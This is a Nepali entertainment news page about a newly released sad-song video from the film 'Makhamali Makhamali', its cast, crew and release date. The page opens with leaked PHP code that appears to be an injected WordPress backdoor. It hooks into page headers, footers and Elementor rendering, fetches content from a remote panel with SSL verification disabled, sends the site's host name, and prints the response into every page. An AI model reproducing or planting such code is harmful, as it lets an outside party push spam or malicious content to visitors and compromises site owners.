if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} जय किशन फरार हुँदा शुभेच्छालाई तनाब, नपत्याए हेर्नुस् भिडियो – Toppo Khim

जय किशन फरार हुँदा शुभेच्छालाई तनाब, नपत्याए हेर्नुस् भिडियो

काठमाडौं । चलचित्र मखमली मखमली को स्याड गीतको भिडियो सार्वजनिक भएको छ । राजु गिरीको निर्देशनमा निर्माण भएको पछिल्लो उक्त चलचित्रमा समावेस बिर्सन सजिलो भएन बोलको गीतको भिडियो सार्वजनिक भएको हो ।

राजु गिरी प्रोडक्सनको व्यानरमा सावित्रा चिलुवालले निर्माण गरेको चलचित्र मखमली मखमलीमा समावेस आज सार्वजनिक भएको गीत राजेन्द्र थापाले लेखेका हुन् भने बसन्त सापकोटाको संगीतमा इतु जोजिजुले गाएकी छिन् । मार्मिक शब्द, संगीत र स्वरको त्रिवेणीमा भिडियो पनि अत्यन्त मर्मस्पर्शी बनाईएको छ । गीतको भिडियोमा नायक जयक किशन बस्नेत र नायिका शुभेच्छा थापाको दमदार अभिनय देख्न सकिन्छ । आफ्ना हरेक चलचित्रमा गीत संगीतको पाटोलाई बलियो बनाउँन खप्पिस राजु गिरी यस चलचित्रमा पनि चुकेका छैनन् । यस अघि बिन्दास २ मा समाबेस सुन्छु तिमीले मलाई भुल्नै आँटेकी छौ रे भन्दा पनि चलचित्र मखमली मखमलीमा समावेस बिर्सन सजिलो भएन ले आम श्रोता दर्शकको मन जित्न सक्ने अनुमान गर्न सकिन्छ ।

जय किशन बस्नेत र शुभेच्छा थापाको साथमा सबिन बाँस्तोला, सारदा गिरी (काली बुढी), सावित्रा चिलुवाल लगायतका कलाकारहरुले अभिनय गरेका छन् । त्यसै गरी बसन्त सापकोटा, बाबुल गिरी र सावित्रा चिलुवालको संगीत, रामजी लामिछाने र अनिल राईको नृत्य, अशोक खड्काको द्वन्द, रामेश्वर हुमागाईंको छायाँकन रहेको छ । चलचित्रको देशब्यापी प्रदर्शन यही आउँदो मंसिर १३ गतेदेखि हुदैछ ।

भिडियो हेर्न लिंकमा क्लिक गर्नुहोस् :

Comments (0)
Add Comment